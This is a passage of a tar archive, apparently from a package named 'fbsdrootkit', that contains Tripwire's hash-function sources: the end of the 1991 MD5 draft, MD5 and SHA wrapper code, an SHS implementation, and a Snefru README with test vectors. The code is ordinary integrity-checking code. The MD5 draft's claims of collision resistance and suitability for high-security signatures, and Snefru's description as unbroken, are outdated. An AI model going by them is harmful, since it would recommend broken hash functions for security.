a, b, X[11], S23, 643717713); /* 19 */ GG (b, c, d, a, X[ 0], S24, 3921069994); /* 20 */ GG (a, b, c, d, X[ 5], S21, 3593408605); /* 21 */ GG (d, a, b, c, X[10], S22, 38016083); /* 22 */ GG (c, d, a, b, X[15], S23, 3634488961); /* 23 */ GG (b, c, d, a, X[ 4], S24, 3889429448); /* 24 */ GG (a, b, c, d, X[ 9], S21, 568446438); /* 25 */ GG (d, a, b, c, X[14], S22, 3275163606); /* 26 */ GG (c, d, a, b, X[ 3], S23, 4107603335); /* 27 */ GG (b, c, d, a, X[ 8], S24, 1163531501); /* 28 */ GG (a, b, c, d, X[13], S21, 2850285829); /* 29 */ GG (d, a, b, c, X[ 2], S22, 4243563512); /* 30 */ GG (c, d, a, b, X[ 7], S23, 1735328473); /* 31 */ GG (b, c, d, a, X[12], S24, 2368359562); /* 32 */ /* Round 3. */ /* Let HH(a,b,c,d,X[k],s,t) denote the operation Rivest and Dusse [Page 5] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 a = b + ((a + H(b,c,d) + X[k] + t) <<< s). */ /* Let S31 = 4, S32 = 11, S33 = 16, and S34 = 23. */ /* Do the following 16 operations. */ HH (a, b, c, d, X[ 5], S31, 4294588738); /* 33 */ HH (d, a, b, c, X[ 8], S32, 2272392833); /* 34 */ HH (c, d, a, b, X[11], S33, 1839030562); /* 35 */ HH (b, c, d, a, X[14], S34, 4259657740); /* 36 */ HH (a, b, c, d, X[ 1], S31, 2763975236); /* 37 */ HH (d, a, b, c, X[ 4], S32, 1272893353); /* 38 */ HH (c, d, a, b, X[ 7], S33, 4139469664); /* 39 */ HH (b, c, d, a, X[10], S34, 3200236656); /* 40 */ HH (a, b, c, d, X[13], S31, 681279174); /* 41 */ HH (d, a, b, c, X[ 0], S32, 3936430074); /* 42 */ HH (c, d, a, b, X[ 3], S33, 3572445317); /* 43 */ HH (b, c, d, a, X[ 6], S34, 76029189); /* 44 */ HH (a, b, c, d, X[ 9], S31, 3654602809); /* 45 */ HH (d, a, b, c, X[12], S32, 3873151461); /* 46 */ HH (c, d, a, b, X[15], S33, 530742520); /* 47 */ HH (b, c, d, a, X[ 2], S34, 3299628645); /* 48 */ /* Round 4. */ /* Let II(a,b,c,d,X[k],s,t) denote the operation a = b + ((a + I(b,c,d) + X[k] + t) <<< s). */ /* Let S41 = 6, S42 = 10, S43 = 15, and S44 = 21. */ /* Do the following 16 operations. */ II (a, b, c, d, X[ 0], S41, 4096336452); /* 49 */ II (d, a, b, c, X[ 7], S42, 1126891415); /* 50 */ II (c, d, a, b, X[14], S43, 2878612391); /* 51 */ II (b, c, d, a, X[ 5], S44, 4237533241); /* 52 */ II (a, b, c, d, X[12], S41, 1700485571); /* 53 */ II (d, a, b, c, X[ 3], S42, 2399980690); /* 54 */ II (c, d, a, b, X[10], S43, 4293915773); /* 55 */ II (b, c, d, a, X[ 1], S44, 2240044497); /* 56 */ II (a, b, c, d, X[ 8], S41, 1873313359); /* 57 */ II (d, a, b, c, X[15], S42, 4264355552); /* 58 */ II (c, d, a, b, X[ 6], S43, 2734768916); /* 59 */ II (b, c, d, a, X[13], S44, 1309151649); /* 60 */ II (a, b, c, d, X[ 4], S41, 4149444226); /* 61 */ II (d, a, b, c, X[11], S42, 3174756917); /* 62 */ II (c, d, a, b, X[ 2], S43, 718787259); /* 63 */ II (b, c, d, a, X[ 9], S44, 3951481745); /* 64 */ /* Then perform the following additions. (That is, increment each of the four registers by the value it had before this block was started.) */ A = A + AA B = B + BB C = C + CC D = D + DD Rivest and Dusse [Page 6] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 end /* of loop on i */ 3.5 Step 5. Output The message digest produced as output is A, B, C, D. That is, we begin with the low-order byte of A, and end with the high-order byte of D. This completes the description of MD5. A reference implementation in C is given in the Appendix. 4. Summary The MD5 message-digest algorithm is simple to implement, and provides a "fingerprint" or message digest of a message of arbitrary length. It is conjectured that the difficulty of coming up with two messages having the same message digest is on the order of 2^64 operations, and that the difficulty of coming up with any message having a given message digest is on the order of 2^128 operations. The MD5 algorithm has been carefully scrutinized for weaknesses. It is, however, a relatively new algorithm and further security analysis is of course justified, as is the case with any new proposal of this sort. 5. Summary of Differences Between MD4 and MD5 The following are the differences between MD4 and MD5: -- A fourth round has been added. -- Each step now has a unique additive constant. -- The function g in round 2 was changed from (XY v XZ v YZ) to (XZ v Y not(Z)) to make g less symmetric. -- Each step now adds in the result of the previous step. This promotes a faster "avalanche effect". -- The order in which input words are accessed in rounds 2 and 3 is changed, to make these patterns less like each other. -- The shift amounts in each round have been approximately optimized, to yield a faster "avalanche effect". The shifts in different rounds are distinct. Rivest and Dusse [Page 7] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 6. Security Considerations The level of security discussed in this memo is considered to be sufficient for implementing very high security hybrid digital- signature schemes based on MD5 and a public-key cryptosystem. References [1] Rivest, R.L., The MD4 Message Digest Algorithm (RFC 1186), October 1990. [2] Rivest, R.L., The MD4 message digest algorithm, presented at CRYPTO '90 (Santa Barbara, CA, August 11-15, 1990). [3] CCITT, The Directory---Authentication Framework (Recommendation X.509), 1988. Authors' Addresses Ronald L. Rivest Massachusetts Institute of Technology Laboratory for Computer Science NE43-324 545 Technology Square Cambridge, MA 02139-1986 Phone: (617) 253-5880 EMail: rivest@theory.lcs.mit.edu Steve Dusse RSA Data Security, Inc. 10 Twin Dolphin Drive Redwood City, CA 94065 Phone: (415) 595-8782 EMail: dusse@rsa.com Rivest and Dusse [Page 8] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 APPENDIX - Reference Implementation This appendix contains the following files: md5.h -- header file for implementation of MD5 md5.c -- the source code for MD5 routines md5driver.c -- sample test routines session -- sample results of running md5driver It is not difficult to improve this implementation on particular platforms, an exercise left to the reader. Following are some suggestions: 1. Change MD5Update so that the context is not used at all if it is empty (mdi == 0) and 64 or more bytes remain (inLen >= 64). In other words, call Transform with inBuf in this case. (This requires that byte ordering is correct in inBuf.) 2. Implement a procedure MD5UpdateLong modeled after MD5Update where inBuf is UINT4 * instead of unsigned char *. MD5UpdateLong would call Transform directly with 16- word blocks from inBuf. Call this instead of MD5Update in general. This works well if you have an I/O procedure that can read long words from a file. 3. On "little-endian" platforms where the lowest-address byte in a long word is the least significant (and there are no alignment restrictions), change MD5Update to call Transform directly with 64-byte blocks from inBuf (typecast to a UINT4 *). Rivest and Dusse [Page 9] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 fbsdrootkit-1.2/tripwire-1.2/sigs/md5/md5.h100600 764 764 2163 5611466376 15606 0ustar dfdf/*********************************************************************** ** md5.h -- header file for implementation of MD5 ** ** RSA Data Security, Inc. MD5 Message-Digest Algorithm ** ** Created: 2/17/90 RLR ** ** Revised: 12/27/90 SRD,AJ,BSK,JT Reference C version ** ** Revised (for MD5): RLR 4/27/91 ** **********************************************************************/ /* $Id: md5.h,v 1.5 1994/07/15 11:03:26 gkim Exp $ */ /* typedef a 32-bit type */ #ifdef TW_TYPE32 typedef unsigned TW_TYPE32 UINT4; #else typedef unsigned long int UINT4; #endif /* Data structure for MD5 (Message-Digest) computation */ typedef struct { UINT4 i[2]; /* number of _bits_ handled mod 2^64 */ UINT4 buf[4]; /* scratch buffer */ unsigned char in[64]; /* input buffer */ unsigned char digest[16]; /* actual digest after MD5Final call */ } MD5_CTX; void MD5Init(); void MD5Update(); void MD5Final(); int sig_md5_get(); fbsdrootkit-1.2/tripwire-1.2/sigs/md5/md5wrapper.c100600 764 764 3760 5614757143 17204 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: md5wrapper.c,v 1.10 1994/07/25 15:46:43 gkim Exp $"; #endif /* * md5wrapper.c * * signature function hook for MD5 (the RSA Data Security, Inc. MD5 * Message Digesting Algorithm) for Tripwire. * * The original MD5 code is contained in md5.c in its entirety. * * Gene Kim * Purdue University * September 27, 1992 */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #ifdef STRINGH #include #else #include #endif #include "../../include/sigs.h" #include "md5.h" #define BUFSIZE 4096 static MD5_CTX mdbucket; /* MD5 data structure */ char *btob64(); /* * int * pf_signature(int fd_in, char *ps_signature, int siglen) * * fd_in: pointer to input file descriptor * ps_signature: pointer to array where signature will be stored * siglen: length of the signature array (for overflow checking) */ int sig_md5_get (fd_in, ps_signature, siglen) int fd_in; char *ps_signature; int siglen; { unsigned char buffer[BUFSIZE]; int readin; int i; MD5_CTX *mdbuf; char s[128]; FILE *fp; mdbuf = &mdbucket; ps_signature[0] = '\0'; /* get stdio handle * we use dup() so we can close() it later */ if (!(fp = (FILE *) fdopen(dup(fd_in), "rb"))) { perror("sig_haval_get: fdopen()"); exit(1); } /* rewind the file descriptor */ rewind(fp); MD5Init (mdbuf); while ((readin = fread(buffer, 1, BUFSIZE, fp)) > 0) { MD5Update(mdbuf, buffer, readin); } if (readin < 0) { perror("sig_md5_get: read()"); exit(1); } MD5Final (mdbuf); if (printhex) { for (i = 0; i < 16; i++) { #if (TW_TYPE32 == int) sprintf (s, "%02x", mdbuf->digest[i]); #else sprintf (s, "%02lx", mdbuf->digest[i]); #endif strcat(ps_signature, s); } } /* base 64 */ else { btob64(mdbuf->digest, ps_signature, 128); } fclose(fp); return 0; } fbsdrootkit-1.2/tripwire-1.2/sigs/sha/ 40700 764 764 0 5630552016 14721 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/sha/Makefile100600 764 764 444 5474057140 16446 0ustar dfdf# $Id: Makefile,v 1.2 1993/11/22 06:38:24 genek Exp $ # # Makefile for SHA wrapper # # Gene Kim # Purdue University # August 10, 1993 # all: sha.o shawrapper.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -rf *.o .pure sha.o: ../../include/byteorder.h shawrapper.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/sha/sha.c100600 764 764 26450 5614757145 16002 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: sha.c,v 1.5 1994/07/25 15:46:45 gkim Exp $"; #endif /* * sha.c * * signature function hook for SHA. * * Gene Kim * Purdue University * August 10, 1993 */ /* --------------------------------- SHS.H ------------------------------- */ /* NIST proposed Secure Hash Standard. Written 2 September 1992, Peter C. Gutmann. This implementation placed in the public domain. Comments to pgut1@cs.aukuni.ac.nz */ /* --------------------------------- SHS.C ------------------------------- */ /* NIST proposed Secure Hash Standard. Written 2 September 1992, Peter C. Gutmann. This implementation placed in the public domain. Comments to pgut1@cs.aukuni.ac.nz */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #ifdef TEST #include #endif #include "../../include/sigs.h" #include "../../include/byteorder.h" #include "sha.h" #if BYTEORDER == 0x1234 #define LITTLE_ENDIAN #endif /* The SHS f()-functions */ #define f1(x,y,z) ( ( x & y ) | ( ~x & z ) ) /* Rounds 0-19 */ #define f2(x,y,z) ( x ^ y ^ z ) /* Rounds 20-39 */ #define f3(x,y,z) ( ( x & y ) | ( x & z ) | ( y & z ) ) /* Rounds 40-59 */ #define f4(x,y,z) ( x ^ y ^ z ) /* Rounds 60-79 */ /* The SHS Mysterious Constants */ #define K1 0x5A827999L /* Rounds 0-19 */ #define K2 0x6ED9EBA1L /* Rounds 20-39 */ #define K3 0x8F1BBCDCL /* Rounds 40-59 */ #define K4 0xCA62C1D6L /* Rounds 60-79 */ /* SHS initial values */ #define h0init 0x67452301L #define h1init 0xEFCDAB89L #define h2init 0x98BADCFEL #define h3init 0x10325476L #define h4init 0xC3D2E1F0L /* 32-bit rotate - kludged with shifts */ #define S(n,X) ( ( X << n ) | ( X >> ( 32 - n ) ) ) /* The initial expanding function */ #ifdef NEW_SHA #define expand(count) temp = W[ count - 3 ] ^ W[ count - 8 ] ^ W[ count - 14 ] ^ W[ count - 16 ];W[ count ] = S(1, temp) #else #define expand(count) W[ count ] = W[ count - 3 ] ^ W[ count - 8 ] ^ W[ count - 14 ] ^ W[ count - 16 ] #endif /* The four SHS sub-rounds */ #define subRound1(count) \ { \ temp = S( 5, A ) + f1( B, C, D ) + E + W[ count ] + K1; \ E = D; \ D = C; \ C = S( 30, B ); \ B = A; \ A = temp; \ } #define subRound2(count) \ { \ temp = S( 5, A ) + f2( B, C, D ) + E + W[ count ] + K2; \ E = D; \ D = C; \ C = S( 30, B ); \ B = A; \ A = temp; \ } #define subRound3(count) \ { \ temp = S( 5, A ) + f3( B, C, D ) + E + W[ count ] + K3; \ E = D; \ D = C; \ C = S( 30, B ); \ B = A; \ A = temp; \ } #define subRound4(count) \ { \ temp = S( 5, A ) + f4( B, C, D ) + E + W[ count ] + K4; \ E = D; \ D = C; \ C = S( 30, B ); \ B = A; \ A = temp; \ } /* The two buffers of 5 32-bit words */ LONG h0, h1, h2, h3, h4; LONG A, B, C, D, E; /* Initialize the SHS values */ void shsInit(shsInfo) SHS_INFO *shsInfo; { /* Set the h-vars to their initial values */ shsInfo->digest[ 0 ] = h0init; shsInfo->digest[ 1 ] = h1init; shsInfo->digest[ 2 ] = h2init; shsInfo->digest[ 3 ] = h3init; shsInfo->digest[ 4 ] = h4init; /* Initialise bit count */ shsInfo->countLo = shsInfo->countHi = 0L; } /* Perform the SHS transformation. Note that this code, like MD5, seems to break some optimizing compilers - it may be necessary to split it into sections, eg based on the four subrounds */ void shsTransform(shsInfo) SHS_INFO *shsInfo; { LONG W[ 80 ], temp; int i; /* Step A. Copy the data buffer into the local work buffer */ for( i = 0; i < 16; i++ ) W[ i ] = shsInfo->data[ i ]; /* Step B. Expand the 16 words into 64 temporary data words */ expand( 16 ); expand( 17 ); expand( 18 ); expand( 19 ); expand( 20 ); expand( 21 ); expand( 22 ); expand( 23 ); expand( 24 ); expand( 25 ); expand( 26 ); expand( 27 ); expand( 28 ); expand( 29 ); expand( 30 ); expand( 31 ); expand( 32 ); expand( 33 ); expand( 34 ); expand( 35 ); expand( 36 ); expand( 37 ); expand( 38 ); expand( 39 ); expand( 40 ); expand( 41 ); expand( 42 ); expand( 43 ); expand( 44 ); expand( 45 ); expand( 46 ); expand( 47 ); expand( 48 ); expand( 49 ); expand( 50 ); expand( 51 ); expand( 52 ); expand( 53 ); expand( 54 ); expand( 55 ); expand( 56 ); expand( 57 ); expand( 58 ); expand( 59 ); expand( 60 ); expand( 61 ); expand( 62 ); expand( 63 ); expand( 64 ); expand( 65 ); expand( 66 ); expand( 67 ); expand( 68 ); expand( 69 ); expand( 70 ); expand( 71 ); expand( 72 ); expand( 73 ); expand( 74 ); expand( 75 ); expand( 76 ); expand( 77 ); expand( 78 ); expand( 79 ); /* Step C. Set up first buffer */ A = shsInfo->digest[ 0 ]; B = shsInfo->digest[ 1 ]; C = shsInfo->digest[ 2 ]; D = shsInfo->digest[ 3 ]; E = shsInfo->digest[ 4 ]; /* Step D. Serious mangling, divided into four sub-rounds */ subRound1( 0 ); subRound1( 1 ); subRound1( 2 ); subRound1( 3 ); subRound1( 4 ); subRound1( 5 ); subRound1( 6 ); subRound1( 7 ); subRound1( 8 ); subRound1( 9 ); subRound1( 10 ); subRound1( 11 ); subRound1( 12 ); subRound1( 13 ); subRound1( 14 ); subRound1( 15 ); subRound1( 16 ); subRound1( 17 ); subRound1( 18 ); subRound1( 19 ); subRound2( 20 ); subRound2( 21 ); subRound2( 22 ); subRound2( 23 ); subRound2( 24 ); subRound2( 25 ); subRound2( 26 ); subRound2( 27 ); subRound2( 28 ); subRound2( 29 ); subRound2( 30 ); subRound2( 31 ); subRound2( 32 ); subRound2( 33 ); subRound2( 34 ); subRound2( 35 ); subRound2( 36 ); subRound2( 37 ); subRound2( 38 ); subRound2( 39 ); subRound3( 40 ); subRound3( 41 ); subRound3( 42 ); subRound3( 43 ); subRound3( 44 ); subRound3( 45 ); subRound3( 46 ); subRound3( 47 ); subRound3( 48 ); subRound3( 49 ); subRound3( 50 ); subRound3( 51 ); subRound3( 52 ); subRound3( 53 ); subRound3( 54 ); subRound3( 55 ); subRound3( 56 ); subRound3( 57 ); subRound3( 58 ); subRound3( 59 ); subRound4( 60 ); subRound4( 61 ); subRound4( 62 ); subRound4( 63 ); subRound4( 64 ); subRound4( 65 ); subRound4( 66 ); subRound4( 67 ); subRound4( 68 ); subRound4( 69 ); subRound4( 70 ); subRound4( 71 ); subRound4( 72 ); subRound4( 73 ); subRound4( 74 ); subRound4( 75 ); subRound4( 76 ); subRound4( 77 ); subRound4( 78 ); subRound4( 79 ); /* Step E. Build message digest */ shsInfo->digest[ 0 ] += A; shsInfo->digest[ 1 ] += B; shsInfo->digest[ 2 ] += C; shsInfo->digest[ 3 ] += D; shsInfo->digest[ 4 ] += E; } #ifdef LITTLE_ENDIAN /* When run on a little-endian CPU we need to perform byte reversal on an array of longwords. It is possible to make the code endianness- independant by fiddling around with data at the byte level, but this makes for very slow code, so we rely on the user to sort out endianness at compile time */ static void byteReverse(buffer, byteCount) LONG *buffer; int byteCount; { LONG value; int count; byteCount /= sizeof( LONG ); for( count = 0; count < byteCount; count++ ) { value = ( buffer[ count ] << 16 ) | ( buffer[ count ] >> 16 ); buffer[ count ] = ( ( value & 0xFF00FF00L ) >> 8 ) | ( ( value & 0x00FF00FFL ) << 8 ); } } #endif /* LITTLE_ENDIAN */ /* Update SHS for a block of data. This code assumes that the buffer size is a multiple of SHS_BLOCKSIZE bytes long, which makes the code a lot more efficient since it does away with the need to handle partial blocks between calls to shsUpdate() */ void shsUpdate(shsInfo, buffer, count) SHS_INFO *shsInfo; BYTE *buffer; int count; { /* Update bitcount */ if( ( shsInfo->countLo + ( ( LONG ) count << 3 ) ) < shsInfo->countLo ) shsInfo->countHi++; /* Carry from low to high bitCount */ shsInfo->countLo += ( ( LONG ) count << 3 ); shsInfo->countHi += ( ( LONG ) count >> 29 ); /* Process data in SHS_BLOCKSIZE chunks */ while( count >= SHS_BLOCKSIZE ) { memcpy( (char *) shsInfo->data, (char *) buffer, SHS_BLOCKSIZE ); #ifdef LITTLE_ENDIAN byteReverse( shsInfo->data, SHS_BLOCKSIZE ); #endif /* LITTLE_ENDIAN */ shsTransform( shsInfo ); buffer += SHS_BLOCKSIZE; count -= SHS_BLOCKSIZE; } /* Handle any remaining bytes of data. This should only happen once on the final lot of data */ memcpy( (char *) shsInfo->data, (char *) buffer, count ); } void shsFinal(shsInfo) SHS_INFO *shsInfo; { int count; LONG lowBitcount = shsInfo->countLo, highBitcount = shsInfo->countHi; /* Compute number of bytes mod 64 */ count = ( int ) ( ( shsInfo->countLo >> 3 ) & 0x3F ); /* Set the first char of padding to 0x80. This is safe since there is always at least one byte free */ ( ( BYTE * ) shsInfo->data )[ count++ ] = 0x80; /* Pad out to 56 mod 64 */ if( count > 56 ) { /* Two lots of padding: Pad the first block to 64 bytes */ memset( ( char * ) shsInfo->data + count, 0, 64 - count ); #ifdef LITTLE_ENDIAN byteReverse( shsInfo->data, SHS_BLOCKSIZE ); #endif /* LITTLE_ENDIAN */ shsTransform( shsInfo ); /* Now fill the next block with 56 bytes */ memset( (char *) shsInfo->data, 0, 56 ); } else /* Pad block to 56 bytes */ memset( ( char * ) shsInfo->data + count, 0, 56 - count ); #ifdef LITTLE_ENDIAN byteReverse( shsInfo->data, SHS_BLOCKSIZE ); #endif /* LITTLE_ENDIAN */ /* Append length in bits and transform */ shsInfo->data[ 14 ] = highBitcount; shsInfo->data[ 15 ] = lowBitcount; shsTransform( shsInfo ); #ifdef LITTLE_ENDIAN byteReverse( shsInfo->data, SHS_DIGESTSIZE ); #endif /* LITTLE_ENDIAN */ } #ifdef TEST /* ----------------------------- SHS Test code --------------------------- */ /* Size of buffer for SHS speed test data */ #define TEST_BLOCK_SIZE ( SHS_DIGESTSIZE * 100 ) /* Number of bytes of test data to process */ #define TEST_BYTES 10000000L #define TEST_BLOCKS ( TEST_BYTES / TEST_BLOCK_SIZE ) void main() { SHS_INFO shsInfo; time_t endTime, startTime; BYTE data[ TEST_BLOCK_SIZE ]; long i; /* Test output data (this is the only test data given in the SHS document, but chances are if it works for this it'll work for anything) */ shsInit( &shsInfo ); shsUpdate( &shsInfo, ( BYTE * ) "abc", 3 ); shsFinal( &shsInfo ); if( shsInfo.digest[ 0 ] != 0x0164B8A9L || shsInfo.digest[ 1 ] != 0x14CD2A5EL || shsInfo.digest[ 2 ] != 0x74C4F7FFL || shsInfo.digest[ 3 ] != 0x082C4D97L || shsInfo.digest[ 4 ] != 0xF1EDF880L ) { puts( "Error in SHS implementation" ); exit( -1 ); } /* Now perform time trial, generating MD for 10MB of data. First, initialize the test data */ memset( data, 0, TEST_BLOCK_SIZE ); /* Get start time */ printf( "SHS time trial. Processing %ld characters...\n", TEST_BYTES ); time( &startTime ); /* Calculate SHS message digest in TEST_BLOCK_SIZE byte blocks */ shsInit( &shsInfo ); for( i = TEST_BLOCKS; i > 0; i-- ) shsUpdate( &shsInfo, data, TEST_BLOCK_SIZE ); shsFinal( &shsInfo ); /* Get finish time and time difference */ time( &endTime ); printf( "Seconds to process test input: %ld\n", endTime - startTime ); printf( "Characters processed per second: %ld\n", TEST_BYTES / ( endTime - startTime ) ); } #endif fbsdrootkit-1.2/tripwire-1.2/sigs/sha/sha.h100600 764 764 2606 5614757147 15766 0ustar dfdf/* Useful defines/typedefs */ typedef unsigned char BYTE; #ifdef TW_TYPE32 typedef unsigned TW_TYPE32 LONG; #else typedef unsigned long LONG; #endif /* The SHS block size and message digest sizes, in bytes */ #define SHS_BLOCKSIZE 64 #define SHS_DIGESTSIZE 20 /* The structure for storing SHS info */ typedef struct { LONG digest[ 5 ]; /* Message digest */ LONG countLo, countHi; /* 64-bit bit count */ LONG data[ 16 ]; /* SHS data buffer */ } SHS_INFO; /* Whether the machine is little-endian or not */ int sig_sha_get(); /* The next def turns on the change to the algorithm introduced by NIST at * the behest of the NSA. It supposedly corrects a weakness in the original * formulation. Bruce Schneier described it thus in a posting to the * Cypherpunks mailing list on June 21, 1994 (as told to us by Steve Bellovin): * * This is the fix to the Secure Hash Standard, NIST FIPS PUB 180: * * In Section 7 of FIPS 180 (page 9), the line which reads * * "b) For t=16 to 79 let Wt = Wt-3 XOR Wt-8 XOR Wt-14 XOR * Wt-16." * * is to be replaced by * * "b) For t=16 to 79 let Wt = S1(Wt-3 XOR Wt-8 XOR Wt-14 XOR * Wt-16)." * * where S1 is a left circular shift by one bit as defined in * Section 3 of FIPS 180 (page 6): * * S1(X) = (X<<1) OR (X>>31). * */ #define NEW_SHA fbsdrootkit-1.2/tripwire-1.2/sigs/sha/shawrapper.c100600 764 764 4054 5614757150 17353 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: shawrapper.c,v 1.6 1994/07/25 15:46:48 gkim Exp $"; #endif /* * shawrapper.c * * signature function hook for SHA for Tripwire. * * The original SHA code is contained in sha.c in its entirety. * * Gene Kim * Purdue University * August 10, 1993 */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #ifdef STRINGH #include #else #include #endif #include "../../include/sigs.h" #include "sha.h" char *pltob64(); /* * int * pf_signature(int fd_in, char *ps_signature, int siglen) * * fd_in: pointer to input file descriptor * ps_signature: pointer to array where signature will be stored * siglen: length of the signature array (for overflow checking) */ #define BLOCKSIZE SHS_BLOCKSIZE int sig_sha_get (fd_in, ps_signature, siglen) int fd_in; char *ps_signature; int siglen; { SHS_INFO shsInfo; unsigned char buffer[BLOCKSIZE]; int readin = -1; int i; char s[128]; FILE *fp; extern void shsInit(), shsUpdate(), shsFinal(); ps_signature[0] = '\0'; /* get stdio handle * we use dup() so we can close() it later */ if (!(fp = (FILE *) fdopen(dup(fd_in), "rb"))) { perror("sig_haval_get: fdopen()"); exit(1); } /* rewind the file descriptor */ rewind(fp); shsInit( &shsInfo ); while ((readin = fread((char *)buffer, 1, BLOCKSIZE, fp)) == BLOCKSIZE) { shsUpdate(&shsInfo, buffer, readin); } if (readin < 0) { perror("sig_sha_get: read()"); exit(1); } if (readin >= 0) { shsUpdate(&shsInfo, buffer, readin); } shsFinal( &shsInfo ); /* print out the signature */ if (printhex) { for (i = 0; i < 5; i++) { #if (TW_TYPE32 == int) sprintf(s, "%08x", shsInfo.digest[i]); #else sprintf(s, "%08lx", shsInfo.digest[i]); #endif strcat(ps_signature, s); } } /* base 64 */ else { pltob64(shsInfo.digest, ps_signature, 5); } fclose(fp); return 0; } fbsdrootkit-1.2/tripwire-1.2/sigs/snefru/ 40700 764 764 0 5630552017 15451 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/snefru/Makefile100600 764 764 372 5474057141 17176 0ustar dfdf# $Id: Makefile,v 1.3 1993/11/22 06:38:25 genek Exp $ # # Makefile for snefru wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: snefru.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -rf *.o .pure snefru.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/snefru/README.snefru100600 764 764 20464 5434607554 17770 0ustar dfdf# $Id: README.snefru,v 1.2 1993/08/19 05:28:12 genek Exp $ The Snefru one-way hash function package is copyrighted by Xerox Corporation. The following disclaimer can be found in the Snefru C code: (Comments on changes made to accomodate its use within Tripwire follow the disclaimer.) ================== /* This is an implementation of Snefru. Snefru is a one-way hash function that provides authentication. It does not provide secrecy. Snefru is named after a Pharaoh of ancient Egypt. Copyright (c) Xerox Corporation 1989. All rights reserved. License to copy and use this software is granted provided that it is identified as the "Xerox Secure Hash Function" in all material mentioning or referencing this software or this hash function. License is also granted to make and use derivative works provided that such works are identified as "derived from the Xerox Secure Hash Function" in all material mentioning or referencing the derived work. Xerox Corporation makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. These notices must be retained in any copies of any part of this software. Updated information about Snefru is available from arisia.xerox.com in directory /pub/hash by anonymous FTP. The README file provides a quick introduction. This is version 2.5a, November 29, 1990. Version 2.5a provides a reasonably understandable and efficient implementation of Snefru. Further, this version provides 8 passes. While 4 pass Snefru has not been broken, the use of 4 pass Snefru for production use is not recommended at this time. Further study of the security of Snefru is required before production use is advisable. This program reads from the standard input until EOF is reached (the first "read" that returns 0 bytes). The data on the standard input is "hashed" with a cryptographically secure one-way hash function (also known as a "message digest", "fingerprint", "Manipulation Detection Code" or "MDC"). The hash is then printed on the standard output. The input can be of any size. The output is 128 bits printed as 32 characters in hex. The output size can be changed to 256 bits be setting the parameter OUTPUT_BLOCK_SIZE to 8. (The 8 indicates the number of 32-bit words in the output). The primary use of one-way hash functions is to determine if there have been any unauthorized, malicious, or accidental changes made to a file. For example, if an executable program file produces the hash "209884c4 2e89d967 5456ac0e 61269550", then any change to that program file will cause the hash to be changed. Thus, the tampering can be detected by comparing the current output value with the previously computed (and presumably correct) output value. Hash512 is the centrol routine in this program. It is used in this program in a linear fashion -- i.e., a sequential file is hashed down by repeated applications of Hash512. Changing a single bit in the file would then require completely re-computing the hash from the point of change onward. Hash512 can be used in a tree-structured fashion to authenticate a large table of data. This would imply that changing a single bit would not force a complete re-computation of the hash value, but would instead require only log n re-computations of Hash512 to "patch up" the changes along the path from the root to the changed leaf entry. A tree-structured application also has the advantage that any single entry in the table can subsequently be authenticated by someone who knows only the "authentication path" from the root of the tree to the leaf entry. These concepts are discussed more thoroughly in "Secrecy, Authentication, and Public Key Systems" by Ralph C. Merkle, UMI Research Press, 1982 (see particularly Chapter 2, "One Way Hash Functions"). The use of a tree-structured pattern of applications of a one-way hash function is covered by U.S. Patent #4,309,569, "Method of Providing Digital Signatures" (contact Stanford University, Office of Technology Licensing). At the present time (November 29, 1990) the author knows of no method for "breaking" this one-way function, (i.e., finding two input files that produce the same output value). We recommend against the use of output sizes smaller than 128 bits, and against the use of an input that is less than 2 (two) words larger than the size of the output. When the input size equals the output size, Snefru suffers a serious degradation in security (an observation due to Coppersmith). Further study and validation of the security of Snefru is required prior to production use. If anyone using this program finds two different inputs that produce the same output, please contact Ralph C. Merkle via E-mail (merkle@xerox.com) or via normal mail at: Xerox PARC 3333 Coyote Hill Road Palo Alto, CA 94304 (415) 494-4000 See the paper "A Fast Software One Way Hash Function" by Ralph C. Merkle, to appear in The Journal of Cryptology, for a more detailed explanation. The following test cases were taken directly from a terminal, and can be used to verify the correct functioning of an implementation of Snefru. The first input is simply a carriage return followed by control-d. The second input is "1" followed by carriage return followed by control-d, the third input is "12" followed by carriage return followed by control-d, etc. (In some cases, two control-d's will be required). Note that the test cases given are from 8-pass Snefru (e.g., SECURITY_LEVEL=8) % ./snefru d9fcb317 1c097fbb a8c8f12a a0906bad % ./snefru 1 44ec420c e99c1f62 feb66c53 c24ae453 % ./snefru 12 7182051a a852ef6f ba4b6c9c 9b79b317 % ./snefru 123 bc3a50af 82bf56d6 a64732bc 7b050a93 % ./snefru 1234 c5b8a049 85a8eadf b4331a89 88752b77 % ./snefru 12345 d559a2b6 2f6f4411 1324f852 08723707 % ./snefru 123456 6cfb5e8f 1da02bd1 67b01e48 16686c30 % ./snefru 1234567 29aa4832 5f275a8a 7a01ba15 43c54ba5 % ./snefru 12345678 be862a6b 68b7df88 7ebe0031 9cbc4a47 % ./snefru 123456789 6103721c cd8ad565 d68e90b0 f8906163 % The following outputs were obtained after the program was compiled with OUTPUT_BLOCK_SIZE set to 8. This can be done by using the -D option on cc, as: cc -o snefru256 -DOUTPUT_BLOCK_SIZE=8 snefru.c Note that the test cases given are from 8-pass Snefru (e.g., SECURITY_LEVEL=8) % ./snefru256 2e02687f 0d45d5b9 b50cb68c 3f33e684 3d618a1a ca2d0689 3d3eb4e3 026b5732 % ./snefru256 1 bfea4a05 a2a2ef15 c736d114 598a20b9 d9bd4d66 b661e6b0 5ecf6a77 37bdc58c % ./snefru256 12 ac677d69 761ade3f 189c7aef 106d5fe7 392d324e 